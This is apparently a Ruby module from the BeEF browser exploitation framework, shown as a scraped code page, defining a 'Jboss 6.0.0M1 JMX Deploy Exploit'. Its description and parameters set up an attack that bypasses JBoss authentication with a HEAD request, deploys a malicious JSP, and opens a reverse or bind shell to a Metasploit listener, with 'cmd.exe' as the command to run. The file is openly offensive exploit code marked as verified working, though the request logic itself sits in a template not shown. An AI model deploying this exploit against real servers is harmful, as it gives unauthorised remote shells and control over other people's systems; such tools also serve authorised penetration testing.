1dcac350f2
git-svn-id: https://beef.googlecode.com/svn/trunk@990 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
40 lines
1.8 KiB
Ruby
40 lines
1.8 KiB
Ruby
class Jboss_jmx_upload_exploit < BeEF::Core::Command
|
|
|
|
#
|
|
# Defines and set up the command module.
|
|
#
|
|
def initialize
|
|
super({
|
|
'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit',
|
|
'Description' => 'Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload.',
|
|
'Category' => 'Network',
|
|
'Author' => 'antisnatchor, l33tb0y',
|
|
'Data' => [
|
|
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
|
|
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
|
|
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
|
|
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
|
|
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
|
|
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
|
|
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
|
|
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
|
|
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
|
|
}
|
|
],
|
|
'File' => __FILE__
|
|
})
|
|
|
|
set_target({
|
|
'verified_status' => VERIFIED_WORKING,
|
|
'browser_name' => ALL
|
|
})
|
|
|
|
use_template!
|
|
end
|
|
|
|
def callback
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|